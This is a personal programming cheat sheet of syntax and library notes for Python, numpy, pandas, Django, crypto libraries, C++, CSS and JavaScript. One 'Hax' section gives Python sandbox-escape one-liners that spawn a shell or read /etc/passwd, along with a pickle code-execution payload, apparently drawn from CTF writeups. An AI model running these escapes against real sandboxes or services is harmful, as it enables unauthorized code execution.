betaveros's cheat sheet

Script

if __name__ == "__main__": ...

Future

• from __future__ import print_function
• from __future__ import division

Unicode

PEP 0263. First or second lines:

# coding=utf-8

# -*- coding: utf-8 -*-

# vim: set fileencoding=utf-8 :

import codecs
codecs.encode(obj, encoding, errors)
codecs.decode(obj, encoding, errors)

can pass first 1 or first 2 arguments

encoding = "ascii" if omitted; alternatives: utf_8, latin_1, big5 etc.

errors = "strict" if omitted; alternatives: ignore, replace etc.

String (→ std. methods, module)

• "formatstring".format(arg0, arg1, name=value)
  • Access things: {}{0}{1[0]}{2.name}{name}
  • Generic: {access:*>+#255,.3d}
  • shortcut: {:0255}
  • space-pad: {>255}
  • foo = 0; bar = "baz"; "{foo} {bar}".format(**locals()) is fairly useful trick to quickly interpolate lots of local variables. Just use f-strings.
• str.translate(None, "setofchars") deletes characters from set
• str.[lr]strip("setofchars") from left/right/both sides
• str.replace(old, new) exists (not regex)

Regex (→ pydoc)

Special chars: .^$*+?{}\[]|()

• re.search(pattern, string[, flags]) yields a MatchObject anywhere in string
• re.match(pattern, string[, flags]) yields a MatchObject from start or None
• re.fullmatch(pattern, string[, flags]) yields a MatchObject of the whole string or None (3.4+)
• re.split(pattern, string[, maxsplit=0, flags=0]) yields a list of strings
• re.findall(pattern, string[, flags]) → a list of strings
• re.finditer(pattern, string[, flags]) → iterator of MatchObjects
• re.sub(pattern, replacer, string[, count, flags]) returns a string. replacer is string (double-escape chars like '\n', use r'\1' or r'\g<123>' or r'\g<0>' for a backref) or function mapping MatchObject to string

MatchObject.group(n) gets the nth group. n = 0 or omitted means the whole match. Groups:

• (?: ) non-capturing
• (?# ) comment
• (?= ) lookahead / (?! ) negative lookahead
• (?<= ) lookbehind / (?<! ) negative lookbehind

Sequences (→ std. methods) and Dictionaries (→ pydoc)

• Python 2.7: Replace "iter" with "view" for view objects.
• Python 3 change: keys(), values(), items() give view objects instead of lists; the other methods are gone (but you can just listify view objects). View objects are iterable, have len, update dynamically if the map changes, and can be used like sets.

• Destructively updating a dictionary with another, or with a sequence of key-value pairs: d1.update(d2).
• Nondestructive idiom(?) for union-ing two dictionaries with string keys: dict(d1, **d2). 3.9 (PEP 0584): d1 | d2

In both points above, when there are conflicting mappings for the same key, d2 takes precedence.

Sets (→ std. doc)

• x in set_a, x not in set_a
• set_a | set_b, set_a & set_b, set_a - set_b, set_a ^ set_b; compound assignment set_a |= set_b etc.
• set_a.add(x); set_a.update(xs)
• set_a.remove(x) (KeyError if x not in set_a)
• set_a.discard(x) (no error)
• set_a.pop() (arbitrary element)
• set_a.clear()

collections (→ pydoc)

• .deque
  • .append(_), .appendleft(_)
  • .pop(), .popleft() (return popped elements)
• .Counter([iterable-or-mapping-or-kwargs]) e.g. Counter("aaaabb"), Counter(a=4, b=2)
  • .elements() iterates over elements as many times as counted: ["a", "a", "a", "a", "b", "b"]
  • .update(_), +, - treat like multisets
• .defaultdict([default_factory[, ...]])
  • will call default_factory() for default values, so pass e.g. int (for 0), list (for [])...

os Navigate Filesystem

• os.chdir(pathstring)
• os.listdir(pathstring) (unordered list of entries, no . or ..)
• os.getcwd()
• os.path.join(*paths) intelligently joins
• os.rename(src, dst) (file or dir)
• os.renames(src, dst) (same, path dirs allowed)
• os.walk(path, topdown=True, (more omitted)) is a generator that walks all subdirectories. It yields a 3-tuple (dirpath, dirnames, filenames) for each directory. To do stuff, use os.path.join(root, x) for x and use You can modify dirnames in-place to inform or prune the walk.
• os.path.exists("foo")
• os.path.isfile("foo") (exists and is file?)
• os.path.isdir("foo") (exists and is directory?)

subprocess

proc = subprocess.Popen("cat", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(stdout_data, stderr_data) = proc.communicate([input=some_bytes])

One-shot, newer API:

result = subprocess.run("cat", [input=some_bytes,] stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result.stdout # bytes or None
result.stderr # bytes or None

The first argument in both is args: str|List[str].

• If str: either simply the program to be run (if shell=False) or the whole shell line to lex and expand.
• If List[str]: a list with first element the program to be run and remaining the string arguments to pass to it.

Add the encoding='utf-8' argument to Popen or run, and use unicode instead of bytes for both input and output.

In 3.7+, on run() only, capture_output=True is short for stdout=subprocess.PIPE, stderr=subprocess.PIPE

Itertools

Random

Other Standard Library

import getpass
password = getpass.getpass()

import time
time.sleep(0.5) # 0.5 seconds

Hax

[t for t in().__class__.__base__.__subclasses__()if'Sized'==t.__name__][0].__len__.__globals__['__builtins__']['__import__']('os').system('sh')

(most modern variation, Eryksun via Ned Batchelder)

[t for t in (1).__class__.__bases__[-1].__subclasses__() if t.__name__ == 'file'][0]('/etc/passwd').read()

(from On principle (eevee))

Want a shell instead?

[x for x in().__class__.__bases__[0].__subclasses__() if x.__name__ == "catch_warnings"
][0].__init__.func_globals["linecache"].__dict__["os"].execlp("sh","sh")

(from Jonathan Zong's picoCTF 2013 writeup)

from stackoverflow, expression to throw an error:

type(lambda:0)(type((lambda:0).func_code)(
  1,1,1,67,'|\0\0\202\1\0',(),(),('x',),'','',1,''),{}
)(Exception())

type(lambda: 0)(type((lambda: 0).__code__)(
    1,0,1,1,67,b'|\0\202\1\0',(),(),('x',),'','',1,b''),{}
)(Exception())

import pickle
class RCE:
    def __reduce__(self): return os.system, ("echo 'hi'",)
print(pickle.loads(pickle.dumps(RCE())))

• R = REDUCE: take a callable and a tuple of args from stack, call it
• c = GLOBAL: take two strings as argument (not from stack), self.find_class(modname, name) ≈ getattr(sys.modules[modname], name) with compatiblity shims and (if protocol ≥ 4) splitting name by .
• \x93 = STACK_GLOBAL: take two strings from stack, self.find_class(modname, name)

pygmentize

has complicated command line flags:

pygmentize -f html -l python -O full,style=tango -o out.html src.py

note it can guess -f and infer -l from source file extension

numpy

import numpy as np is standard. np. is implied in most names below...

Array construction

• array([[1, 2, 3], [4, 5, 6]])
• eye(n), identity(n)
• ones(shape), zeros(shape), full(shape, fill_values)
• arange([start,] stop, [step]) (basically just python range, except returns ndarray)
• linspace(start, stop, num=50, endpoint=True) (50 evenly spaced samples in inclusive interval [start, stop], or half-open [start, stop) if endpoint is False)
• The above can receive a dtype argument which is like numpy.int64, numpy.float_, or numpy.bool_. If you just use Python's int, float, or bool, it will Just Work. You can also make your own by writing something in a string somehow.
• fromfunction(fn, shape)

Array properties

• arr.shape is a tuple of the dimensions
• arr.ndim is the number of dimensions (so, the length of arr.shape; may be called its rank)
• arr.size is a single number, the number of elements (so, the product of arr.shape)
• arr.dtype is the type of the array's elements

Matrix operations

Note that * (along with most other operations) acts element-wise! Broadcasting occurs by "right-aligning" axes, e.g. [3 × 1 array] + [3 array] = [3 × 3 array].

• _.astype('float32')
• np.transpose(_) or _.T (identity on 1D arrays! may need to reshape)
• np.linalg.det(_)
• np.dot(_, _), or _ @ _ (Python 3 only: __matmul__ operator)
• np.linalg.inv(_)

Indexing, Slicing

• Index and/or slice like arr[1,2,3:4]. You can use bare colons to slice everything along a dimension. (arr[1][2][3:4] still works, for the reasons you'd expect.)
• You can also index with one tuple (but not other sequence types) like arr[(1,2,3)] == arr[1,2,3].
• Basic slices return views, so they're fast. arr[::-1] is a good way to reverse.
• You can also do "advanced indexing" with one or many non-tuple sequences of indices (crudely, it zips them and indexes by each one to produce a new array). So arr[[1,2,3]] (unlike the above) will index by 1, then by 2, then by 3, and return the results in one array; and arr[[1,2,3],[4,5,6]] will index by (1,4), (2,5), and (3,6).
• Or "advanced indexing" with an array of booleans (it filters for the true ones). Example: you can filter by arr[arr % 2 == 0].
• You can combine different indexing modes along different dimensions.
• numpy.nonzero(arr) returns the indices of elements that are nonzero, but kind of strangely; watch out! It returns a tuple of arrays, one for each dimension of arr, so arr[nonzero(arr)] gives you an array of the nonzero values. If you want to iterate over indexes and then unpack them, do transpose(nonzero(arr)).

Iterating

• Iterating over an array directly indexes along the first (index 0) dimension, e.g. iterating over a 2D array gives you the rows.
• a.flat yields all values (in row-major order).
• np.ndenumerate(a) yields (index, value) pairs; the index is a tuple of ints.

Folds

• np.sum, np.prod, np.min, np.max, np.all, np.any, np.count_nonzero fold the matrix to one scalar result. Specify an axis argument, a dimension or tuple of dimensions, to fold along only certain axes. np.sum usefully promotes to bigger int types on booleans. Also all these functions can be called as methods on an array. (I think the modern name under np is np.amin/amax, but the above seem to work too, and methods are still max/min.)
• (Don't confuse these folds with np.minimum and np.maximum, which take element-wise min/max of arrays, like the pairs of elements adding two arrays would operate on.)

Array manipulation

• np.append(arr1, arr2, axis=0) e.g. np.append(x, [[1]], axis=0) (you almost certainly want an axis; otherwise it flattens everything, ew)
• np.concatenate([arr1, arr2, ...], axis=0) (requires arrays have same dimensions except along axis, returns an array also with same dimensions except along axis; axis is 0 by default)
• np.stack([arr1, arr2, ...], axis=0) (requires arrays have the exact same shape, returns an array with an additional axis specified by the parameter)
• arr.reshape(shape) e.g. arr.reshape((-1, 1)) converts to a column vector; -1 is the unknown dimension you can specify once
• arr.expand_dims(axis) adds one or more length-1 axes
• arr.squeeze(axis) eliminates one or more length-1 axes

pandas

import pandas as pd

pd.read_csv(magic)
pd.read_table(magic) # tsv by default

1-D data is Series. 2-D data is DataFrame (df below). They are quite similar to ndarray. The most important philosophical difference is that the data in Series and DataFrame are tightly associated with their labels or indices, and operations generally preserve and operate between corresponding labels and indices (for example, slicing [1:4] will give a result that still has indices 1, 2, 3) (whereas in ndarrays, operations operate between corresponding fickle positions.)

Basic Info

df.info() # sizes etc
df.describe() # descriptive statistics: count, mean etc.
df['colname'].dtype # data type
s.values, df.values # ndarray
s.shape, df.shape # consistent with ndarray
series.index; df.index, df.columns

Slicing

df.loc['foo'] # index by label only
df.iloc[3] # index by numeric position only, 0-indexed

df.head(10)
df.tail(10)

df.drop([1, 2, 3])
df.drop(['colname'], axis=1)

New Columns

df['newcolname'] = df['colname'] + 1
# nondestructive:
df.assign({'newcolname': df['colname'] + 1})
df.assign(newcolname = df['colname'] + 1)

Index Manipulation

series.reindex(list_of_indices)
# always keeps association between each index and its data
# drops missing indexes; fills new indexes with NaN

series.sort_index()

series/df.rename(index: dict|(OldIndex → NewIndex)) # changes indexes
df.rename(columns: dict|(OldIndex → NewIndex)) # changes column labels
# or, where mapper : dict | (OldIndex → NewIndex)
df.rename(mapper, axis='index')
df.rename(mapper, axis='columns')

df.set_index('colname') # makes the data indexed by existing column 'colname'
df.set_index(['colname', 'colname2']) # ditto, but MultiIndex
df.reset_index() # demotes index to a normal column, index by 0, 1, etc.

If you just want to blow away the index-value association, I think df.values is the best way.

Working with Conditions

df1 == df2, df1 < df2 # etc. broadcast fine
(df + df).equals(df * 2) # ==, except NaN equals NaN
(df['colname'] < 10).count()
df[df['colname'] < 10]
df[df['colname'].isin([1, 3, 5, 7, 9])]

NaN

np.nan
df.dropna(how='any')
df.fillna(value=5)
df.isna(), df.notna() # because nan != nan

Reductions

series.empty, df.empty

series.mean(), series.sum(), series.std(), ...
series.nunique() # number of distinct values
series.value_counts() # value → frequency of value
pd.cut(series, num_bins), pd.qcut(series)
series.idxmin(), series.idxmax() # index of min and max; like argmax, the name numpy uses
series.agg(np.sum)
(series > 0).all(), .any(), .bool()
# above can also be done to DataFrames
# gives results are per column, for columns that make sense

Maps/Lifting

df.pipe(f) # f(df), but may be more readable/chainable style

• lift (ndarray → ndarray) to (DataFrame → DataFrame)

  df.transform(np.abs) # map on underlying ndarray
  df.transform([np.abs, lambda x: x + 1])

• lift (Series → Series) to (DataFrame → DataFrame)

  df.apply(lambda x: x.max() - x.min(0)) # map columns

• lift (ndarray → ndarray) to (Series → Series) (also works to lift element → element?)

  series.apply(some_function)
  df['colname'].apply(some_function) # map each element of column
  df['colname'] = df['colname'].apply(some_function)

• lift (element → element) to (Series → Series)

  series.map(lambda x: len(str(x))) # elementwise map

• lift (element → element) to (DataFrame → DataFrame)

  df.applymap(lambda x: len(str(x))) # elementwise map

• cast

  df.astype('float32')

• proxy-ish map string operations

  series.str.lower()

Sort

df.sort_values(by='colname')
df.sort_values(by='colname', ascending=False)
df['colname'].sort_values()

More Stats

df.cov()
series1.corr(series2, [method='pearson'|'kendall'|'spearman'])
series.rank() # minimum is 1, maximum is n; ties become average of tied ranks by default

Group (split → apply → combine)

df.groupby('colname').mean() # mean per group
etc: .size() .sum() .std()
df.groupby('colname').describe()
df.groupby('colname').colname2.agg(['mean', 'min', 'max'])
df.groupby('colname').get_group('colvalue')
df.groupby(('colname1', 'colname2'))

df.groupby('colname').transform(lambda x: x - x.mean())

df.filter(lambda group: group['colname'].sum() > 300)

pytorch

torch.cat(Sequence[tensor], dim=0) → Sequence[tensor] # along that dimension
torch.stack(Sequence[tensor], dim=0) → tensor # adds a dimension
torch.view(*dims) # reshape sharing data, fails if noncontiguous
torch.reshape(*dims) # reshape, copies if needed
torch.unsqueeze(dim) # adds a dimension

torch.randn(*dims)

tensor.requires_grad_() # trailing _ means mutate
tensor.zero_()

# ops
+ - / % @ & | ^ ...
tensor.maximum(t1, t2), tensor.minimum(t1, t2)

# folds
tensor.max(), tensor.argmax(), tensor.mean(), tensor.any(), tensor.all()...
tensor.item() # extract single scalar


# manual backprop:
tensor.data -= tensor.grad; tensor.grad.zero_()

Django

Program.objects.get(name='Splash 2016')

Models (1.10 docs)

prog = Program(...)
prog.save()
prog.name = 'lol'
prog.save()
prog.delete()

(Or one-step creation:)

Program.objects.create(name = 'gg')

These all deal with QuerySets.

Program.objects # Manager
Program.objects.all() # QuerySet with all
Program.objects.filter(name__contains='2016')
# other things: field__gt=3, field__other_field etc
Program.objects.get(name='Splash 2016')
Program.objects.order_by('name')

StudentRegistration.valid_objects().filter(
             section__parent_class__parent_program=prog,
             relationship__name='Enrolled'
         )
enrolled.values_list('user__last_name', 'user').distinct()

# race-condition-free modifying stuff in database:
reporter = Reporters.objects.get(name='Tintin')
reporter.stories_filed = F('stories_filed') + 1 # no math happens here!
reporter.save()
reporter.refresh_from_db() # if you need the actual data

Entry.objects.filter(number_of_comments__gt=F('number_of_pingbacks') * 2)

Company.objects.order_by(F('last_contacted').desc(nulls_last=True))

company = Company.objects.annotate(chairs_needed=F('num_employees') - F('num_chairs'))


from django.db.models import OuterRef, Subquery
newest = Comment.objects.filter(post=OuterRef('pk')).order_by('-created_at')
Post.objects.annotate(newest_commenter_email=Subquery(newest.values('email')[:1]))

Post.objects.annotate(
    recent_comment=Exists(
        Comment.objects.filter(post=OuterRef('pk'), created_at__gte=one_day_ago)
    )
)
# ~Exists is OK

# this line is Django 3.0+:
Post.objects.filter(Exists(...))

total_comments = comments.annotate(total=Sum('length')).values('total')
Post.objects.filter(length__gt=Subquery(total_comments))


from django.db.models import Avg, Max, Count, Q
Book.objects.all().aggregate(foo=Avg('price')) # terminal action, you get { 'foo': 12.34 }
# (or automatically generated keys if args)
Publisher.objects.annotate(num_books=Count('book'))
Publisher.objects.annotate(below_5=Count('book', filter=Q(book__rating__lte=5)))

# joins instead of subqueries, so multiple aggregations are bad:
Book.objects.annotate(Count('authors', distinct=True), Count('store', distinct=True))

Requests

import requests
r = requests.get('http://www.example.com/', params={'foo': 'bar'}) # values can also be lists
r = requests.post('http://www.example.com/', data={'foo': 'bar'}) # auto form-encodes; str/bytes is OK too

Other parameters include:

• cookies={'foo': 'bar'}
• headers={'user-agent': 'my-app/0.0.1'}
• json={'foo': 'bar'} (data= its JSON representation; some APIs take it)

r.url # see which URL was requested, after redirects; includes the encoded params you passed
  r.history # Response objects for any redirects that occurred
r.status_code
  r.raise_for_status() # raise exception if 4xx or 5xx
r.text # automagical unicode
  r.content # bytes
  r.json() # parse as JSON
r.headers # of response; magical dict with case-insensitive keys
r.cookies # of response

Make a session to store cookies:

sess = request.Session()
sess.get('http://www.example.com/') # as before

struct

struct.pack(fmt, v1, v2, ...)
struct.unpack(fmt, bytes) # always tuple, possibly length-1
struct.calcsize(fmt) # number of bytes

First character of fmt optionally indicates endianness/size/alignment. You probably just want one of:

< little-endian (x86)
> big-endian ("natural writing")

Remaining characters format things one at a time. Uppercase variants indicate the things in brackets, usually unsigned. Most useful:

• '<I' packs/unpacks 32-bit unsigned ints. struct.pack('<I', num)
• '<Q' packs/unpacks 64-bit unsigned ints. struct.pack('<Q', num)

Precede with a count a la vi to repeat: '4h' means 'hhhh'. Exception: for 's' the count means the length of the string. (Pascal-style strings are packed with the first byte indicating the length of the string.)

encoding bytes and ints

b'foo'.hex([sep[, bytes_per_sep]]) # 3.5+
bytes.fromhex('666f6f') # 3.0+

# 3.2+
(some_int).to_bytes(n, 'big'|'little'[, signed=False])
	n = (some_int.bit_length() + 7) // 8
# static method:
int.from_bytes(some_bytes, 'big'|'little'[, signed=False])

# base64 module: bytes to bytes (for greppability: b64encode, b64decode)
base64.b64{encode,decode}(s, altchars='+/') # url '-_'
base64.{standard_b64,urlsafe_b64,b32,b16,a85,b85}{encode,decode}

As before: little-endian is how you'll see it in e.g. x86, big-endian is "natural writing".

hashing, crypto

import hashlib
m = hashlib.sha256(b'init data') # data optional
m.update(b'more data')
m.digest(), m.digest_size; m.hexdigest() # all bytes

# fancy new blake hashes; digest_size and key up to 64|32, salt up to 16|8
# key is replacement for hmac
m = hashlib.blake2b(b'init data', *, digest_size=64, key, salt, ...)
m = hashlib.blake2s(b'init data', *, digest_size=32, key, salt, ...)

import hmac
h = hmac.new(key, msg, hashlib.sha256)
h.update(msg), h.digest(), h.hexdigest()
hmac.digest(key, msg, hashlib.sha256) # bytes
hmac.compare_digest(a, b) # constant-time equality

pip install cryptography

from cryptography.fernet import Fernet
key = Fernet.generate_key() # urlsafe_b64encode(os.urandom(32))
f = Fernet(key)
ciphertext = f.encrypt(plaintext) # "Fernet token"; time of generation in plaintext
f.decrypt(ciphertext)

from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305, AESGCM
# 12-byte nonce only. no extended nonce (transitive through OpenSSL)
key = ChaCha20Poly1305.generate_key() # os.urandom(32)
c = ChaCha20Poly1305(key)
nonce = os.urandom(12)
# --- or ---
key = AESGCM.generate_key(bit_length=128|192|256) # os.urandom(bit_length // 8)
c = AESGCM(key)
nonce = os.urandom(12)

ct = c.encrypt(nonce, plaintext, aad)
c.decrypt(nonce, ciphertext, aad)

pip install pycryptodome

from Crypto.Random import get_random_bytes # shrug

from Crypto.Cipher import ChaCha20_Poly1305
key = get_random_bytes(32)
nonce = get_random_bytes(8|12|24) # len controls variant, default 12; 24 is XChaCha
cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
# --- OR ---
from Crypto.Cipher import AES
key = get_random_bytes(16)
nonce = get_random_bytes(16) # lib default 16 but RFC/interop suggests 12
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)

# if you pass in a nonce, save your own copy; cipher.nonce is a lie (!?)

cipher.update(assoc_data) # optional

ciphertext, tag = cipher.encrypt_and_digest(plaintext) # len(tag) = 16
# --- OR ---
plaintext = cipher.decrypt_and_verify(ciphertext, tag)

# or in steps:
ciphertext = cipher.encrypt(plaintext)  |  plaintext = cipher.decrypt(ciphertext)
tag = cipher.digest()                   |  cipher.verify(tag)
hextag = cipher.hexdigest()             |  cipher.hexverify(hextag)

Pwntools

from pwn import *

enhex('=') = '3d' / unhex('3d') = ('=')
concat: List[List[T]] → List[T]
concat_all: recursive lists → flat list
findall(haystack, needle) → generator of all indices of needle in haystack

group(n, seq, underfull_action=['ignore'|'drop'|'fill'])

ordlist: List[int] → str
unordlist: str → List[int]

p8, p16, p32, p64 (  pack: int → bytes)
u8, u16, u32, u64 (unpack: bytes → int)

    You can pass endian='little'|'big', sign=False|True

more(text), yesno(text)

getter/setter

class Foo:
    @property
    def bar(self): return self._bar
    @bar.setter
    def bar(self, value): self._bar = value
    @bar.deleter
    def bar(self): del self._bar

difflib

import difflib
difflib.SequenceMatcher(None, seqa, seqa).get_opcodes():

Note: This does not actually produce a minimal edit distance.

sum(
    max(i2 - i1, j2 - j1)
    for tag, i1, i2, j1, j2
    in difflib.SequenceMatcher(None, a, b).get_opcodes()
    if tag != 'equal'
)

Explicitly for algorithmic coding; parts apply to Java

int: -2,147,483,648 – 2,147,483,647 | long²: ±9.22 × 10¹⁸

typedef takes type first, then alias: typedef long long lli;

const

const modifies what's immediately to its left, or if it's leftmost, to its right. Read right-to-left.

• const int x = 7; ≡ int const x = 7;
• int const1 * const2 p; = constant₂ pointer to constant₁ int
• References are always const, so int & const x is useless; → int const & x.
• Methods: const at the end means it can be called on a const object.
  • int const& operator[] (unsigned index) const;

struct: initializer, operator

struct Query {
	Query(int l, int r): left(l), right(r) {}
	int left;
	int right;
	bool operator<(const Query& other) const {
		if (right != other.right) return right < other.right;
		return left < other.left;
	}
};

If you don't want to write a constructor, construction as (Query) { .left = 123, .right = 456 } works too. Don't both write a constructor and construct structs this way!

qsort

#include <cstdlib>
int cmp(const void * a, const void * b) {
	int av = *(int*) a;
	int bv = *(int*) b;
	return (av == bv ? 0 : (av < bv ? -1 : 1));
}
std::qsort(arr, n, sizeof(int), cmp);

lambda (anonymous function) (closure)

int x = 0;
auto increaseX = [&](int y) -> int {
	x += y;
};

• -> return_type is optional and can be inferred.
• [...] is the capture-list:
  • [&] captures everything necessary by reference
  • [=] captures everything necessary by value
  • [] captures nothing
  • You can also just list an optional default, followed by variables optionally prefixed with &s, all separated by commas.

You can store the lambda in a std::function (from <functional>) to make the type explicit, especially if you want recursion:

std::function<char(char, int)> f = [&](char c, int reps) -> char {
	if (reps > 0) {
		putchar(c);
		return f(c + 1, reps - 1);
	}
	return c;
};

permutation loop

next_permutation mutates a sequence to the lexicographically next and returns true, except it rolls over from the last to the first and returns false. If a starts sorted, this loops over all permutations and exits the loop sorted again.

do {
	// stuff
} while (next_permutation(a, a + n));

prev_permutation is dual.

I/O

#include <iostream> and #include <iomanip>

• cout.precision(15); OR cout << setprecision(15); (output more digits)
• cout << fixed; (prevent scientific notation for big/small numbers)
• Others that can get <<ed: dec, hex, oct, setw(7), setfill('a')

???

std::shared_ptr<int> foo = std::make_shared<int>(10);
std::weak_ptr<int> bar(foo);

*foo // or foo->field_name
*bar
foo.use_count()
bar.expired()
bar.use_count()


class Foo {
friend std::ostream& operator<<(std::ostream& os, Foo foo);
private:
	int x;

public:
	Foo(int x);

};

std::ostream& operator<<(std::ostream& os, Foo foo) {
	// do stuff
	return os;
}

HTML

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">

<link rel="stylesheet" href="styles.css">

<input type="radio" id="bar" name="foo" value="bar" checked><label for="foo">bar</label>
<input type="radio" id="quux" name="foo" value="quux" checked><label for="foo">quux</label>
// Fire "change" events. Surprisingly unnatural to get the value. Classic IE9+:
document.querySelector('input[name="foo"]:checked').value;
// More modern, requires a <form>:
document.getElementById("form-id").elements["foo"].value;

<input type="number" min="0" max="64" step="2"> // "spinner"
<input type="range" min="0" max="64" step="2"> // slider
// Step is optional; can be "any" in either.

<div data-foo="bar">
// div.dataset.foo === "bar"

<button type="button"> (or it'll be a submit button in a form, even if you attach a listener)

button.disabled = true;

CSS

Specificity = (ID selectors) ≫ (class selectors, attribute selectors, pseudo-classes) ≫ (type selectors, pseudo-elements)

Contexts:

Block formatting contexts (BFCs) affect positioning stuff: chiefly, they contain floats; margins only collapse inside BFCs; position: static|relative|sticky use them. They are introduced by:

• overflow: anything not visible
• getting out of flow: floating, absolute/fixed positioning, display: flow-root; (the purest way to make a new BFC, mediocre browser support)
• display: inline-block, table-cell, table-caption
• flex and grid items
• (contain: layout|content|strict (poor browser support)

Containing blocks for

• static/relative/sticky: content box of closest block container or BFC
• absolute: padding box os closest element with position not static or with a transform, perspective, filter (in Fx), contain: paint
• fixed: viewport, or same set of exceptions (transform etc)

Centering:

• for inline or inline-block, set text-align: center on parent
• for blocks: margin: 0 auto;
• vertical centering: Apparently position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);
• or just use flexbox, it's 2019 2022.

z-index requires set position and competes with other elements in the stacking context.

Flexbox

CSS-tricks' Complete Guide to Flexbox

Flex container:

• display: flex | inline-flex;
• flex-direction: row | row-reverse | column | column-reverse;
• justify-content (parallel to flow)
• align-items (perpendicular to flow; items in each line; default stretch)
• align-content (perpendicular to flow; wrapped flow lines, useless if no wrapping)

(Technically align-* default to "normal", which acts as stretch on align-items and as no value (which I don't understand) on align-content)

Flex item:

• flex-grow: (number);
• flex-shrink: (number);
• flex-basis: (length) | auto;
• flex: (flex-grow) (flex-shrink) (flex-basis); /* default = 0 1 auto */
  • flex: X; = X 1 0;
  • flex: X Y; = X Y 0;
  • flex: initial; = 0 1 auto; /* = default */
  • flex: auto; = 1 1 auto;
  • flex: none; = 0 0 auto;
  Important! Without a flex:, flex-basis defaults to auto. With a flex: that omits it, flex-basis defaults to 0.

Media query

@media (min-width: 400px) { ... }

are we :has yet? (2022: no)

HTTP Responses

Ampersand Escapes (+ LaTeX)

JavaScript Array

Assumes a: T[]

• .length: number
• Start and end:
  • .pop(): T
  • .shift(): T
  • .push(e: T): number // new length
  • .unshift(e: T): number // new length
  • To extend: Array.prototype.push.apply(a, b: T[])
• .join(separator: string): string
• .at(index: number): T // pythonic negative indexes!
• .slice(start: number, end: number): T[] // pythonic negative indexes!
• .indexOf(item: T, fromIndex?: number): number // or -1
• .lastIndexOf(item: T, fromIndex?: number): number // or -1
• Iteration methods (all take callbacks f: (item: T, index: number, a: T[]) => any)
  • .forEach(f)
  • .map(f)
  • .filter(f)
  • .every(f) // all
  • .some(f) // any
  • .find(f) // or undefined
  • .findIndex(f) // or -1
  • .reduce((accumulator: S, item: T, index: number, a: T[]) => S, initialValue?: S): S
• Destructive operations
  • .reverse()
  • .sort(cmp?: (T, T) => number) // default order is always lexicographic by toString! e.g. 100 > 20 > 3
    .sort((x, y) => x - y) // numeric sort
  • .splice(startIndex: number, deleteCount?: number, ...items: T[])

Array(n) magic

(Beware browser compatibility concerns.)

Array(20).fill(1) creates a list of 20 ones. Array(26).keys() is an iterator over its keys, and [...Array(26).keys()] is black magic for the half-open range from 0 to 26.

NOTE: Array(20) has "empty" elements, which are different from the elements being undefined. For the sake of functions like .map, "empty" elements are completely skipped, so that Array(20).map(_ => 1) will give another list of 20 empty elements. But spreading, native iterating, and Array.from() still work fine, for some reason.

JavaScript String

Assumes s: string

• s.length: number
• Indexing, ord/chr conversion:
  • s.charAt(1) or s[1]: length-1 string
  • s.charCodeAt(1): number (UTF-16 code unit)
  • String.fromCharCode(ord: number): length-1 string
• Slices and stuff:
  • s.startsWith(t: string)
  • s.endsWith(t: string)
  • s.indexOf(t: string)
  • s.lastIndexOf(t: string)
  • s.substr(start: number, len: number)
  • s.substring(start: number, end: number)
  • s.trim()
• s.split(separator: string, limit: number): string[]
  • omitting the separator is useless, you get a one-element array with the whole string. Try s.split(/\s+/)
  • "foo".split('') or Array.from("foo") turns into list of length-1 strings
• s.repeat(n: number): string ('abc'.repeat(2) === 'abcabc')
• s.toLowerCase(), s.toUpperCase()
• There is not a great way to test if chars are uppercase/lowercase. You can use s !== s.toLowerCase() or /[A-Z]/.test(s)?

JavaScript Function

f.call(thisArg, arg1, arg2, ...);
f.apply(thisArg, arrayOfArgs);

f.bind(thisArg, arg1, arg2, ...); // bind 'this' + optionally as many args as you want

JavaScript Regex

regex: RegExp, get /[A-Z]/ or new RegExp('[A-Z]')

• regex.exec(s) or s.match(regex): string[]|null, also updates regex.lastIndex if global so you can repeatedly call
• regex.test(s): boolean or s.search(regex): number|-1

JavaScript Map, JavaScript Set

m = new Map();
m = new Map([[1, 'one'], [2, 'two']]);

m.set(3, 'three'); m.delete(3); m.has(3);
m.size; // property, not function!
m.clear();
m.keys(); m.values(); m.entries(); // all iterators, can spread
m.forEach((value, key, map) => {});
[...m] // like m.entries()
for (kvpair of s) {...}

s = new Set();
s = new Set([1, 2, 3, 4, 5]);

s.add(3); s.delete(3); s.has(3);
s.size // property, not function!
s.clear();
s.values(); // iterator; same as s.keys()
s.forEach((value, value, set) => {});
[...s] // spread to convert to array
for (v of s) {...}

JavaScript DOM

window

.innerHeight, .innerWidth: viewport, including scrollbars (to exclude scrollbars, see above: use (root html element).client{Height,Width})

.outerHeight, .outerWidth: whole damn browser (unclear why you'd want this)

Event

Philip Walton: don't use stopPropagation (in case an outer listener wants to close an unrelated modal/menu/...). You can "mark an event as handled" with preventDefault() and if (event.defaultPrevented) return; (though good luck convincing other devs to use this convention)

MouseEvent

click, dblclick, mouseup, mousedown, mousemove; mouseover/mouseout (a single event that bubbles); mouseenter/mouseleave (doesn't bubble, one event per element; more like :hover)

KeyEvent

keydown, keyup (keypress is deprecated, just use keydown or beforeinput) (I think the "input" event is what you want now for updating something in response to every change in a text box)

fetch

fetch('http://example.com/movies.json', options).then((response) => ...)
	options = { method: "POST", headers: { ... }, body: ... }

response.staus // integer
response.ok // boolean if 200 to 299
// promises:
response.json()
response.text()
// i.e. you might
fetch(...).then(response => response.json()).then(...)

jQuery

Lodash

Selected utilities.

• _.flatten(array) (one level)
• _.debounce(func, [wait=0], [options: {leading: boolean = false, maxWait: number?, trailing: boolean}])
• _.times(n, [func]) = [func(0), ..., func(n-1)]
• _.constant(value)
• _.identity
• _.noop // returns undefined

TypeScript

let one: number = 1;
function add(a: number, b: number): number {
	return a + b;
}

• number, string, boolean
• any
• Object
• undefined, null
• number[] or Array<number> (any[] works)
• [string, number] // tuple
• string|number // union
• T&U // intersection
• string|undefined // option (but all types allow undefined and null unless --strictNullChecks)
• function print(x: string): void {...}
• function haltCatchFire(): never {...} // bottom type
• (<string>idk).length or (idk as string).length // type assertion, transpiles to nothing
• type Name = string; // alias
• type Coin = "heads" | "tails"; // light enum

let [first, second, ...rest] = [1, 2, 3, 4];
[first, second] = [second, first];
let comp = [...rest, first, second];
function f([a, b]: [number, string]) {...}
let { a, b } = {a: 1, b: 2};

